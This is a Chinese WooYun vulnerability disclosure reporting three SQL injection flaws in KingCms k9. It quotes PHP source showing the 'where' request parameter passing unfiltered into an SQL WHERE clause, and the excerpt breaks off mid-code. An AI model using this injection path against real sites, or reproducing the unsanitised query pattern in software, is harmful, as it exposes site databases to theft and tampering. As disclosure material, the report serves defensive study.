We also discuss the structure of the primal and dual SDP variables and the constraints.\n\n### Iii-B SDP Problem Elements\n\nA semi-definite programming problem can be stated either in primal or dual format. Given , and , the primal problem is of the form\n\n maxXtr(CX)\n subject toa−B(X)=0\n X⪰0, (28)\n\nwhere the linear operator is defined as\n\n B(X)=[tr(B1X)tr(B2X)⋯tr(BKX)]T. (29)\n\nis the primal variable. Given a primal SDP, the associated dual problem is\n\n miny,ZaTy\n subject toBT(y)−C=Z\n Z⪰0,y∈RK, (30)\n\nwhere is the transpose operator and is given by\n\n BT(y)=K∑i=1yiBi (31)\n\nand where and are the dual variables. The elements , and of the SDP problem associated with the LMIs in (15) and (16) are defined as follows. We define the element as\n\n C:=diag(C1,⋯CL,CL+1,⋯CL+M), (32)\n\nwhere\n\n Ci:={δIn⋅(∑h∈Wdpβ⟨h⟩,idp!h1!⋯hl!),1≤i≤L0n,L+1≤i≤L+M, (33)\n\nwhere recall that is the number of monomials in , is the number of monomials in , where is the dimension of system (6), is the number of uncertain parameters and is a small positive parameter.\n\nFor , define elements as\n\n Bi:=diag(Bi,1,⋯Bi,L,Bi,L+1,⋯Bi,L+M), (34)\n\nwhere is the number of dual variables in (30) and is equal to the product of the number of upper-triangular elements in each (the coefficients in ) and the number of coefficients in (i.e. the cardinality of ). Since there are coefficients in and each coefficient has upper-triangular elements, we find\n\n K=(dp+l−1)!dp!(l−1)!~N. (35)\n\nTo define the blocks, first we define the function ,\n\n V⟨h⟩(x):=~N∑j=1Ejxj+~N(⟨h⟩−1)for allh∈Wdp, (36)\n\nwhich maps each variable to a basis matrix , where recall that is the basis for . Note that a different choice of basis would require a different function . Then for ,\n\n Bi,j:= ⎧⎪ ⎪ ⎪ ⎪⎨⎪ ⎪ ⎪ ⎪⎩∑h∈Wdpβ⟨h⟩,jV⟨h⟩(ei),1≤j≤L(I)−∑h∈Wdp(HT⟨h⟩,j−LV⟨h⟩(ei)+V⟨h⟩(ei)H⟨h⟩,j−L),L+1≤j≤L+M.(II) (37)\n\nFinally, to complete the SDP problem associated with Polya’s algorithm set\n\n a=→1∈RK. (38)\n\n### Iii-C Parallel Set-up Algorithm\n\nIn this section, we propose a decentralized, iterative algorithm for calculating the terms , , and as defined in (22), (24), (32) and (34). The algorithm has been implemented in C++, using MPI (Message Passing Interface) and is available at: www.sites.google.com/a/asu.edu/kamyar/software. We present an abridged description of this algorithm in Algorithm 1, wherein is the number of available processors.\n\nNote that we have only addressed the problem of robust stability analysis, using the polynomial inequality\n\n P(α)≻0,AT(α)P(α)+P(α)A(α)≺0\n\nfor . However, we can generalize the decentralized set-up algorithm to consider a more general class of feasibility problems, i.e.,\n\n ^N∑i=1(~Ai(α)~X(α)~Bi(α)+~BTi(α)~X(α)~ATi(α)+Ri(α))≺0 (41)\n\nfor . One motivation behind the development of such generalized set-up algorithm is that the parameter-dependent versions of the LMIs associated with and synthesis problems in [42, 43] can be formulated in the form of (41).\n\n### Iii-D Set-up algorithm: Complexity Analysis\n\nSince checking the positive definiteness of all representatives of a square matrix with parameters on proper real intervals is intractable , the question of feasibility of (9) is also intractable. To solve the problem of inherent intractability we establish a trade off between accuracy and complexity. In fact, we develop a sequence of decentralized polynomial-time algorithms whose solutions converge to the exact solution of the NP-hard problem. 
In other words, the translation of a polynomial optimization problem to an LMI problem is the main source of complexity. This high complexity is unavoidable and, in fact, is the reason we seek parallel algorithms.\n\nAlgorithm 1 distributes the computation and storage of and among the processors and their dedicated memories, respectively. In an ideal case, where the number of available processors is sufficiently large (equal to the number of monomials in , i.e. ) only one monomial ( of and of ) are assigned to each processor.\n\n1) Computational complexity analysis: The most computationally expensive part of the set-up algorithm is the calculation of the blocks in (37). Considering that the cost of matrix-matrix multiplication is , the cost of calculating each block is According to (34) and (37), the total number of blocks is . Hence, as per Algorithm 1, each processor processes of the blocks, where is the number of available processors. Thus the per processor computational cost of calculating the at each Polya’s iteration is\n\n ∼card(Wdp)⋅n3⋅K(floor(LN)+floor(MN)). (42)\n\nBy substituting for from (35), card from (25), from (26) and from (27), the per processor computation cost at each iteration is\n\n ∼((dp+l−1)!dp!(l−1)!)2n42(n+1)⎛⎜ ⎜ ⎜ ⎜ ⎜⎝floor⎛⎜ ⎜ ⎜ ⎜ ⎜⎝(dp+d1+l−1)!(dp+d1)!(l−1)!N⎞⎟ ⎟ ⎟ ⎟ ⎟⎠+floor⎛⎜ ⎜ ⎜ ⎜ ⎜⎝(dpa+d2+l−1)!(dpa+d2)!(l−1)!N⎞⎟ ⎟ ⎟ ⎟ ⎟⎠1212⎞⎟ ⎟ ⎟ ⎟ ⎟⎠ (43)\n\nassuming that and . For example, for the case of large-scale systems (large and ), the computation cost per processor at each iteration is having processors, having processors and having processors. Thus for the case where , the number of operations grows more slowly in than in .\n\n2) Communication complexity analysis: Communication between processors can be modeled by a directed graph , where the set of nodes is the set of indices of the available processors and the set of edges is the set of all pairs of processors that communicate with each other. For every directed graph we can define an adjacency matrix . If processor communicates with processor , then , otherwise . In this section, we only define the adjacency matrix for the part of the algorithm that performs Polya’s iterations on . For Polya’s iterations on , the adjacency matrix can be defined in a similar manner. For simplicity, we assume that at each iteration, the number of available processors is equal to the number of monomials in" ]
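As a quick illustration of the Polya's Theorem statement quoted in the paper above (condition (10): for a form strictly positive on the simplex, multiplying by (α1 + ... + αl)^d yields all positive coefficients for sufficiently large d), the following minimal Python sketch repeatedly multiplies a scalar two-variable form by (α1 + α2) and reports its smallest coefficient. The scalar case and the specific form α1² − α1α2 + α2² (chosen because it is strictly positive on the unit simplex) are illustrative assumptions; the paper itself works with matrix-valued coefficients.

```python
# A homogeneous form in (a1, a2) of degree d is stored as a list c where
# c[i] is the coefficient of a1**(d-i) * a2**i.
def polya_iterate(coeffs):
    """Multiply the stored form by (a1 + a2): one Polya iteration."""
    out = [0] * (len(coeffs) + 1)
    for i, c in enumerate(coeffs):
        out[i] += c      # contribution of the a1 factor
        out[i + 1] += c  # contribution of the a2 factor
    return out

# F(a) = a1^2 - a1*a2 + a2^2, strictly positive on the unit simplex.
c = [1, -1, 1]
for d in range(6):
    print(f"d = {d}: min coefficient = {min(c)}")
    c = polya_iterate(c)
```

Running this shows the minimum coefficient rising from negative to strictly positive after a few iterations, mirroring the role of the Polya exponents d1, d2 in conditions (11) and (12).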
[ null, "https://storage.googleapis.com/groundai-web-prod/media/users/user_37453/project_46122/images/x1.png", null, "https://storage.googleapis.com/groundai-web-prod/media/users/user_37453/project_46122/images/x3.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.9169218,"math_prob":0.98286325,"size":23526,"snap":"2020-45-2020-50","text_gpt3_token_len":4763,"char_repetition_ratio":0.15423858,"word_repetition_ratio":0.029086992,"special_character_ratio":0.20390207,"punctuation_ratio":0.09594986,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9982068,"pos_list":[0,1,2,3,4],"im_url_duplicate_count":[null,1,null,1,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-10-28T20:58:24Z\",\"WARC-Record-ID\":\"<urn:uuid:ba452263-408d-4fa4-8b34-3f7184028817>\",\"Content-Length\":\"1049303\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:c66e3bdc-561c-4429-8606-b75413c33f53>\",\"WARC-Concurrent-To\":\"<urn:uuid:ff2a1233-dad8-4952-952a-1180752b2b29>\",\"WARC-IP-Address\":\"35.186.203.76\",\"WARC-Target-URI\":\"https://www.groundai.com/project/solving-large-scale-robust-stability-problems-by-exploiting-the-parallel-structure-of-polyas-theorem/\",\"WARC-Payload-Digest\":\"sha1:TJAGP5V54OPGRS72YB3K4ZC47HPRNTR7\",\"WARC-Block-Digest\":\"sha1:GZBSPLTP5DPQ557VI3OC2O6MMVIWNGF5\",\"WARC-Truncated\":\"length\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-45/CC-MAIN-2020-45_segments_1603107900860.51_warc_CC-MAIN-20201028191655-20201028221655-00341.warc.gz\"}"}
https://fr.maplesoft.com/support/help/maplesim/view.aspx?path=RandomTools%2FLinearCongruence%2FNewGenerator
[ "", null, "NewGenerator - Maple Help\n\nRandomTools[LinearCongruence]\n\n NewGenerator\n Create a Linear Congruence Pseudo Random Number Generator", null, "Calling Sequence NewGenerator( opt1, opt2, ... )", null, "Parameters\n\n opt1, opt2, ... - (optional) argument of the form option=value where option is range", null, "Description\n\n • The NewGenerator command outputs a Maple procedure, a pseudo-random number generator, which when called outputs one pseudo-random integer. The output of the generator depends on the options described below. The default is to output integers on the range $0..999999999999$, i.e., a random 12 digit integer.\n • The returned procedure calls the LinearCongruence algorithm to generate the numbers.  Although you can have multiple generating procedures, they all share the same state.  This means that calling one procedure will effect the numbers returned by another.\n • The following optional arguments are supported. They are input as equations in any order.\n • range=integer..integer or integer\n If the value of the range argument is a range, then the integer will be chosen from that range.  If the value of the range argument is an integer, then the integer will be take from the range [0..value).  The default range is $1000000000000$.\n • If one only needs to generate a small number of integers then the GenerateInteger function can be used.  However, using a procedure returned by NewGenerator is faster than calling GenerateInteger multiple times.", null, "Examples\n\n > $\\mathrm{with}\\left(\\mathrm{RandomTools}\\left[\\mathrm{LinearCongruence}\\right]\\right)$\n $\\left[{\\mathrm{GenerateInteger}}{,}{\\mathrm{GetState}}{,}{\\mathrm{NewGenerator}}{,}{\\mathrm{SetState}}\\right]$ (1)\n > $M≔\\mathrm{NewGenerator}\\left(\\mathrm{range}=1..6\\right)$\n ${M}{≔}{\\mathbf{proc}}\\left({}\\right)\\phantom{\\rule[-0.0ex]{0.5em}{0.0ex}}{\\mathrm{LinearCongruence}}{:-}{\\mathrm{LCState}}{≔}{\\mathrm{irem}}{}\\left({427419669081}{*}{\\mathrm{LinearCongruence}}{:-}{\\mathrm{LCState}}{,}{999999999989}\\right){;}\\phantom{\\rule[-0.0ex]{0.5em}{0.0ex}}{\\mathrm{irem}}{}\\left({\\mathrm{LinearCongruence}}{:-}{\\mathrm{LCState}}{,}{6}\\right){+}{1}\\phantom{\\rule[-0.0ex]{0.5em}{0.0ex}}{\\mathbf{end proc}}$ (2)\n > $M\\left(\\right)$\n ${4}$ (3)\n > $\\mathrm{seq}\\left(M\\left(\\right),i=1..10\\right)$\n ${3}{,}{4}{,}{6}{,}{5}{,}{3}{,}{6}{,}{3}{,}{2}{,}{2}{,}{2}$ (4)\n > $M≔\\mathrm{NewGenerator}\\left(\\mathrm{range}={10}^{10}\\right)$\n ${M}{≔}{\\mathbf{proc}}\\left({}\\right)\\phantom{\\rule[-0.0ex]{0.5em}{0.0ex}}{\\mathrm{LinearCongruence}}{:-}{\\mathrm{LCState}}{≔}{\\mathrm{irem}}{}\\left({427419669081}{*}{\\mathrm{LinearCongruence}}{:-}{\\mathrm{LCState}}{,}{999999999989}\\right){;}\\phantom{\\rule[-0.0ex]{0.5em}{0.0ex}}{\\mathrm{irem}}{}\\left({\\mathrm{LinearCongruence}}{:-}{\\mathrm{LCState}}{,}{10000000000}\\right)\\phantom{\\rule[-0.0ex]{0.5em}{0.0ex}}{\\mathbf{end proc}}$ (5)\n > $M\\left(\\right)$\n ${75487163}$ (6)\n > $\\mathrm{seq}\\left(M\\left(\\right),i=1..5\\right)$\n ${7179490457}{,}{9169594160}{,}{8430571674}{,}{498834085}{,}{2920457916}$ (7)\n > $\\mathrm{Float}\\left(M\\left(\\right),-10\\right)$\n ${0.3747019461}$ (8)\n > $\\mathrm{seq}\\left(\\mathrm{Float}\\left(M\\left(\\right),-10\\right),i=1..5\\right)$\n ${0.4031395307}{,}{0.0624947349}{,}{0.1053530086}{,}{0.6486307198}{,}{0.5590763466}$ (9)\n > $M≔\\mathrm{NewGenerator}\\left(\\mathrm{range}={10}^{32}\\right)$\n 
${M}{≔}{\\mathbf{proc}}\\left({}\\right)\\phantom{\\rule[-0.0ex]{0.5em}{0.0ex}}{\\mathbf{local}}\\phantom{\\rule[-0.0ex]{0.5em}{0.0ex}}{t}{;}\\phantom{\\rule[-0.0ex]{0.5em}{0.0ex}}{\\mathrm{LinearCongruence}}{:-}{\\mathrm{LCState}}{≔}{\\mathrm{irem}}{}\\left({427419669081}{*}{\\mathrm{LinearCongruence}}{:-}{\\mathrm{LCState}}{,}{999999999989}\\right){;}\\phantom{\\rule[-0.0ex]{0.5em}{0.0ex}}{t}{≔}{\\mathrm{LinearCongruence}}{:-}{\\mathrm{LCState}}{;}\\phantom{\\rule[-0.0ex]{0.5em}{0.0ex}}{\\mathbf{to}}\\phantom{\\rule[-0.0ex]{0.5em}{0.0ex}}{2}\\phantom{\\rule[-0.0ex]{0.5em}{0.0ex}}{\\mathbf{do}}\\phantom{\\rule[-0.0ex]{0.5em}{0.0ex}}{\\mathrm{LinearCongruence}}{:-}{\\mathrm{LCState}}{≔}{\\mathrm{irem}}{}\\left({427419669081}{*}{\\mathrm{LinearCongruence}}{:-}{\\mathrm{LCState}}{,}{999999999989}\\right){;}\\phantom{\\rule[-0.0ex]{0.5em}{0.0ex}}{t}{≔}{1000000000000}{*}{t}{+}{\\mathrm{LinearCongruence}}{:-}{\\mathrm{LCState}}\\phantom{\\rule[-0.0ex]{0.5em}{0.0ex}}{\\mathbf{end do}}{;}\\phantom{\\rule[-0.0ex]{0.5em}{0.0ex}}{\\mathrm{irem}}{}\\left({t}{,}{100000000000000000000000000000000}\\right)\\phantom{\\rule[-0.0ex]{0.5em}{0.0ex}}{\\mathbf{end proc}}$ (10)\n > $M\\left(\\right)$\n ${92673709525428510973272600608981}$ (11)" ]
[ null, "https://bat.bing.com/action/0", null, "https://fr.maplesoft.com/support/help/maplesim/arrow_down.gif", null, "https://fr.maplesoft.com/support/help/maplesim/arrow_down.gif", null, "https://fr.maplesoft.com/support/help/maplesim/arrow_down.gif", null, "https://fr.maplesoft.com/support/help/maplesim/arrow_down.gif", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.69996977,"math_prob":0.9998485,"size":2595,"snap":"2022-05-2022-21","text_gpt3_token_len":781,"char_repetition_ratio":0.22269394,"word_repetition_ratio":0.037593983,"special_character_ratio":0.30751446,"punctuation_ratio":0.2248394,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99738276,"pos_list":[0,1,2,3,4,5,6,7,8,9,10],"im_url_duplicate_count":[null,null,null,null,null,null,null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-01-22T00:02:07Z\",\"WARC-Record-ID\":\"<urn:uuid:08831d1c-337d-4f13-9fde-d12e19a6e246>\",\"Content-Length\":\"245937\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:74f89f74-080a-459a-b7b7-6d630b9e2fd8>\",\"WARC-Concurrent-To\":\"<urn:uuid:f46c306f-627c-45fd-bed4-7adfcedfd2fc>\",\"WARC-IP-Address\":\"199.71.183.28\",\"WARC-Target-URI\":\"https://fr.maplesoft.com/support/help/maplesim/view.aspx?path=RandomTools%2FLinearCongruence%2FNewGenerator\",\"WARC-Payload-Digest\":\"sha1:NNO5GXBYWRCXEPEJSKP3W7OVUGMS2L67\",\"WARC-Block-Digest\":\"sha1:UDJ6DBZFNW2EKFKPWAXSYYVFC64KPKXF\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-05/CC-MAIN-2022-05_segments_1642320303717.35_warc_CC-MAIN-20220121222643-20220122012643-00645.warc.gz\"}"}
https://futures.io/articles/trading/Floor-Trader-Pivots?s=4b12905d35f6bc4b5e08efd5f8f78027&redirect=no
[ "", null, "Floor Trader Pivots - futures io", null, "", null, "Pivot Points are also know as Floor Trader Pivots (or Pivots or Floor Pivots or Session Pivots). These are the places where traders expect support and resistance to occur in the market and as such are used as entry and exit points for trades.\n\nDepending on the type of pivot formula used you can generally generate and use up to 9 levels. These levels are marked and calculated by starting with a center pivot called a Pivot Point and labeled as PP. From that point, moving up, the resistance levels are numbered sequentially as R1, R2, R3, R4 with R4 being the highest value. The support levels are numbered in the same way S1, S2, S3, S4 with S4 being the lowest support value.\n\nA trader needs to decide if they will calculate their Pivots based on ETH or RTH, the later could be argued to match more closely the time period used by floor traders (who developed Floor Trader Pivots before the advent of computers) and may therefore be more representative of those still calculating pivots. However it needs to be remembered that from 2015 there are basically (with one exception) no floor trading pits anymore when it comes to futures trading.\n\nNowdays with computers VWAP and Volume Profiling (VPOC, VAH and VAL etc) are arguably a better way to calculate and look at typical/average price.\n\nThere are a number of ways to calculate pivots points. Here are some of the more popular methods: Classic Pivot Points, Camarilla Pivot Points, DeMark Pivot Points, Woodie Pivot Points.\n\nThe formula used in the calculation of Classic Pivot Points are:\n\nR4 = R3 + RANGE (same as: PP + RANGE * 3)\nR3 = R2 + RANGE (same as: PP + RANGE * 2)\nR2 = PP + RANGE\nR1 = (2 * PP) - LOW\nPP = (HIGH + LOW + CLOSE) / 3\nS1 = (2 * PP) - HIGH\nS2 = PP - RANGE\nS3 = S2 - RANGE (same as: PP - RANGE * 2)\nS4 = S3 - RANGE (same as: PP - RANGE * 3)\n\nWhere R1 through R4 are Resistance levels 1 to 4, PP is the Pivot Point, S1 through S4 are support levels 1 to 4, RANGE is the High minus the Low for the given time frame (usually daily).\n\nThe formula used in the calculation of Camarilla Pivot Points are:\n\nR4 = C + RANGE * 1.1/2\nR3 = C + RANGE * 1.1/4\nR2 = C + RANGE * 1.1/6\nR1 = C + RANGE * 1.1/12\nPP = (HIGH + LOW + CLOSE) / 3\nS1 = C - RANGE * 1.1/12\nS2 = C - RANGE * 1.1/6\nS3 = C - RANGE * 1.1/4\nS4 = C - RANGE * 1.1/2\n\nWhere R1 through R4 are Resistance levels 1 to 4, PP is the Pivot Point, S1 through S4 are support levels 1 to 4, RANGE is the High minus the Low for the given time frame (usually daily). C stands for the Closing price.\n\nThe formula used in the calculation of Woodie Pivot Points are:\n\nR4 = R3 + RANGE\nR3 = H + 2 * (PP - L) (same as: R1 + RANGE)\nR2 = PP + RANGE\nR1 = (2 * PP) - LOW\nPP = (HIGH + LOW + (TODAY'S OPEN * 2)) / 4\nS1 = (2 * PP) - HIGH\nS2 = PP - RANGE\nS3 = L - 2 * (H - PP) (same as: S1 - RANGE)\nS4 = S3 - RANGE\n\nWhere R1 through R4 are Resistance levels 1 to 4, PP is the Pivot Point, S1 through S4 are support levels 1 to 4, RANGE is the High minus the Low for the given time frame (usually daily).\n\nOne of the key differences in calculating Woodie's Pivot Point to other pivot points is that the current session's open price is used in the PP formula with the previous session's high and low. 
At the time-of-day that we calculate the pivot points on this site in our Daily Notes we do not have the opening price so we use the Classic formula for the Pivot Point and vary the R3 and R4 formula as per Woodie's formulas.\n\n[significant sections sourced from: https://www.mypivots.com/dictionary/definition/155/pivot-points]\n\n Copyright © 2021 by futures io, s.a., Av Ricardo J. Alfaro, Century Tower, Panama, +507 833-9432, [email protected] All information is for educational use only and is not investment advice.There is a substantial risk of loss in trading commodity futures, stocks, options and foreign exchange products. Past performance is not indicative of future results." ]
[ null, "https://www.facebook.com/tr", null, "https://futures.io/styles/fio/fio_logo.svg", null, "https://tradingview.go2cloud.org/aff_i", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.87626797,"math_prob":0.9889052,"size":3513,"snap":"2021-04-2021-17","text_gpt3_token_len":1019,"char_repetition_ratio":0.15246509,"word_repetition_ratio":0.29014084,"special_character_ratio":0.29832053,"punctuation_ratio":0.085434176,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9895883,"pos_list":[0,1,2,3,4,5,6],"im_url_duplicate_count":[null,null,null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-01-20T13:18:16Z\",\"WARC-Record-ID\":\"<urn:uuid:42c02a14-23a4-4e1e-b5ba-85ea75672126>\",\"Content-Length\":\"51099\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:05552409-8c3b-482b-92c1-b4696a63fa94>\",\"WARC-Concurrent-To\":\"<urn:uuid:9238555e-1b55-4458-b751-6963105f18a5>\",\"WARC-IP-Address\":\"216.18.214.170\",\"WARC-Target-URI\":\"https://futures.io/articles/trading/Floor-Trader-Pivots?s=4b12905d35f6bc4b5e08efd5f8f78027&redirect=no\",\"WARC-Payload-Digest\":\"sha1:AMHCDUEI6CSXJ6UZ3RFWQINOZ5BGLALZ\",\"WARC-Block-Digest\":\"sha1:K6ZVM3DD6CX2UQFM7UVHCHD37GUWM7EN\",\"WARC-Identified-Payload-Type\":\"application/xhtml+xml\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-04/CC-MAIN-2021-04_segments_1610703520883.15_warc_CC-MAIN-20210120120242-20210120150242-00763.warc.gz\"}"}
https://wy.zone.ci/bug_detail.php?wybug_id=wooyun-2015-0102490
[ " KingCms最新版(k9)注入3枚打包 | wooyun-2015-0102490| WooYun.org\n\n## 漏洞详情\n\n### 披露状态:\n\n2015-03-20: 积极联系厂商并且等待厂商认领中,细节不对外公开\n2015-05-04: 厂商已经主动忽略漏洞,细节向公众公开\n\n### 简要描述:\n\nKingCms最新版(k9)注入3枚打包\n\n### 详细说明:\n\n``function _create(){\t\\$u=new user;\\$u->auth_role('store');\t\\$db=new db;\t\\$where=kc_get('where',0,1);\t\\$pid=kc_get('pid',2,1);\t\\$rn=kc_get('rn',2,1);\t\\$limit=(\\$rn*(\\$pid-1)).','.\\$rn.';';\t\\$cmd=kc_get('cmd',array('categroy','store','news','product'));\t\\$pcount=kc_get('pcount',2,1);\t\\$start=\\$rn*\\$pid>\\$pcount?\\$pcount:\\$rn*\\$pid;\t\\$file=new file;\t\\$fpath=kc_config('store.url');\tif(\\$cmd=='categroy'){\t\t\\$res=\\$db->getRows('%s_store_categroy','*');\t\tforeach(\\$res as \\$rs){\t\t\t\\$rs['TEMPLATE']='store/'.(empty(\\$rs['template'])?'categroy.php':\\$rs['template']);\t\t\t\\$file->create(\\$rs['url'],\\$rs);\t\t}\t}else if(\\$cmd=='store'){\t\t\\$sids=\\$db->getRows_two('%s_store','sid','sid',\\$where,'',\\$limit);\t\t\\$store=new store;\t\t\\$store->create(\\$sids);\t}else if(\\$cmd=='news'){\t\t\\$res=\\$db->getRows('%s_store_news','*',\\$where,'',\\$limit);\t\t\\$store_urls=array();\t\tforeach(\\$res as \\$rs){\t\t\tif(empty(\\$store_urls[\\$rs['sid']])){\t\t\t\t\\$store=\\$db->getRows_one('%s_store','url','sid='.\\$rs['sid']);\t\t\t\tif(empty(\\$store)){\t\t\t\t\t\\$db->delete('%s_store_news','sid='.\\$sid);\t\t\t\t\tkc_tip('所属店铺数据丢失,已删除对应数据,请重新生成!','form');\t\t\t\t}\t\t\t\t\\$store_urls[\\$rs['sid']]=\\$store['url'];\t\t\t}\t\t\t\\$url=\\$store_urls[\\$rs['sid']];\t\t\t\t\t\t\\$rs['tmpfile']='news.page.php';\t\t\t\\$file->create(\\$url.'news/n'.\\$rs['id'].'/',\\$rs,\\$url.'config.php');\t\t}\t}else if(\\$cmd=='product'){\t\t\\$res=\\$db->getRows('%s_store_product','*',\\$where,'',\\$limit);\t\t\\$store_urls=array();\t\tforeach(\\$res as \\$rs){\t\t\tif(empty(\\$store_urls[\\$rs['sid']])){\t\t\t\t\\$store=\\$db->getRows_one('%s_store','url','sid='.\\$rs['sid']);\t\t\t\tif(empty(\\$store)){\t\t\t\t\t\\$db->delete('%s_store_product','sid='.\\$sid);\t\t\t\t\tkc_tip('所属店铺数据丢失,已删除对应数据,请重新生成!','form');\t\t\t\t}\t\t\t\t\\$store_urls[\\$rs['sid']]=\\$store['url'];\t\t\t}\t\t\t\\$url=\\$store_urls[\\$rs['sid']];\t\t\t\t\t\t\\$rs['tmpfile']='product.page.php';\t\t\t\\$file->create(\\$url.'product/n'.\\$rs['id'].'/',\\$rs,\\$url.'config.php');\t\t}\t}\t\t\\$js=\"\\\\$.kc_progress('#progress_{\\$cmd}',{\\$start},{\\$pcount});\";\t\\$js.=\\$start==\\$pcount ? 
\"\\\\$('.Submit').removeAttr('disabled');\":\"\\\\$.kc_ajax({URL:'\".FULLURL.\"apps/store/index.php',CMD:'create',cmd:'\\$cmd',where:'\\$where',pid:\".(\\$pid+1).\",rn:{\\$rn},pcount:{\\$pcount}});\";\tkc_ajax(array('JS'=>\\$js));}``\n\n``function kc_validate(\\$s,\\$type){\t\\$reg='';\tswitch(\\$type){\t\tcase 1:\\$reg='/^[a-zA-Z0-9]+\\$/';break;\t\tcase 2:\\$reg='/^[0-9]+\\$/';break;\t\tcase 3:\\$reg='/^([0-9]+,)*[0-9]+\\$/';break;\t\tcase 4:\\$reg='/^[A-Za-z0-9\\_]+\\$/';break;\t\tcase 5:\t\t\t\\$reg='/^\\w+([-+.]\\w+)*@\\w+([-.]\\w+)*\\.\\w+([-.]\\w+)*\\$/';break;\t\tcase 6:\t\t\t\\$reg='/^[a-zA-Z]{3,10}:\\/\\/[^\\s]+\\$/';\t\t\tbreak;\t\tcase 7:\t\t\t\\$reg='/^([a-zA-Z]{3,10}:\\/\\/)?[^\\s]+\\.(jpeg|jpg|gif|png|bmp)\\$/';\t\t\tbreak;\t\tcase 8:\t\t\t\\$reg='/^((((1[6-9]|[2-9]\\d)\\d{2})-(0?|1)-(0?[1-9]|\\d|3))|(((1[6-9]|[2-9]\\d)\\d{2})-(0?|1)-(0?[1-9]|\\d|30))|(((1[6-9]|[2-9]\\d)\\d{2})-0?2-(0?[1-9]|1\\d|2[0-8]))|(((1[6-9]|[2-9]\\d)(0||)|((16||)00))-0?2-29)) (20|21|22|23|[0-1]?\\d):[0-5]?\\d:[0-5]?\\d\\$/';\t\t\tbreak;\t\tcase 9:\t\t\t\\$reg='/^((((1[6-9]|[2-9]\\d)\\d{2})-(0?|1)-(0?[1-9]|\\d|3))|(((1[6-9]|[2-9]\\d)\\d{2})-(0?|1)-(0?[1-9]|\\d|30))|(((1[6-9]|[2-9]\\d)\\d{2})-0?2-(0?[1-9]|1\\d|2[0-8]))|(((1[6-9]|[2-9]\\d)(0||)|((16||)00))-0?2-29))\\$/';\t\t\tbreak;\t\tcase 10:\\$reg='/^\\d?\\.\\d?\\.\\d{4}\\$/';break;\t\tcase 11:\\$reg='/^((2[0-4]\\d|25[0-5]|?\\d\\d?)\\.){3}(2[0-4]\\d|25[0-5]|?\\d\\d?)\\$/';break;\t\tcase 12:\\$reg='/^(\\d+(\\.\\d+)?)\\$/';break;\t\tcase 13:\\$reg='/^([0-9A-Za-z]+,)*[0-9A-Za-z]+\\$/';break;\t\tcase 14:\\$reg='/^#?[0-9A-Fa-f]{6}\\$/';break;\t\tcase 15:\\$reg='/^([a-zA-Z0-9\\_\\-]+\\/)+\\$/';\t\t\t\\$s=preg_replace('/\\{([a-zA-Z0-9]+)\\}/','\\$1',\\$s);//替换{ID}等类型为ID\t\t\t\\$path=preg_replace('/(([a-zA-Z0-9\\_\\-]+\\/)*)([a-zA-Z0-9\\_\\-]+\\/)/','\\$3',\\$s);\t\t\t//kc_tip(\\$path,'form');\t\t\t//if(preg_match('/^[pP]\\d+\\$/',\\$path)){return false;}\t\t\tbreak;\t\tcase 17:\\$reg='/^([a-zA-Z]{3,10}:\\/\\/)[^\\s]+\\$/';break;\t\tcase 18:\t\t\t\\$reg='/^((((1[6-9]|[2-9]\\d)\\d{2})-(0?|1)-(0?[1-9]|\\d|3))|(((1[6-9]|[2-9]\\d)\\d{2})-(0?|1)-(0?[1-9]|\\d|30))|(((1[6-9]|[2-9]\\d)\\d{2})-0?2-(0?[1-9]|1\\d|2[0-8]))|(((1[6-9]|[2-9]\\d)(0||)|((16||)00))-0?2-29)) (20|21|22|23|[0-1]?\\d):[0-5]?\\d\\$/';\t\t\tbreak;\t\tcase 22:\\$reg='/^(\\-|\\+)?[0-9]+\\$/';break;\t\tcase 23:\\$reg='/^[a-zA-Z][a-zA-Z0-9\\_]*/';break;\t\tcase 24:\\$reg='/^([a-zA-Z0-9\\-_]+\\/)+\\$/';break;\t\tcase 25:\\$reg='/[a-zA-Z0-9\\+\\%]+(\\=)*\\$/';break;\t\tcase 33:\\$reg='/^(\\-?[0-9]+\\,?)+\\$/';break;\t\tcase 34:\\$reg=\"/^[^\\s!-\\/:[email protected]\\[-`\\{-~]+\\$/\";break;\t\tdefault:\\$reg=\\$type;break;\t}\t//如果为数组类型\tif (is_array(\\$reg)) {\t\t\\$bool=in_array(\\$s,\\$reg);\t}else{\t\t\\$bool= empty(\\$type)\t\t\t? true\t\t\t: (empty(\\$reg) ? false : (bool)preg_match(\\$reg,\\$s));\t}\treturn \\$bool;}``\n\n\\$_POST['where']进入\\$db->getRows,去看看\\$db->getRows\n\n``public function getRows(\\$table,\\$insql='*',\\$where=null,\\$order=null,\\$limit=null,\\$group=null) {\t\t\\$table=str_replace('%s',DB_PRE,\\$table);\t\t\\$sql=\"SELECT \\$insql FROM \\$table \";\t\t\\$sql.= empty(\\$where) ? '' : \" WHERE \\$where\";\t\t\\$sql.= empty(\\$group) ? '' : \" GROUP BY \\$group\";\t\t\\$sql.= empty(\\$order) ? '' : \" ORDER BY \\$order\";\t\t\\$sql.= empty(\\$limit) ? 
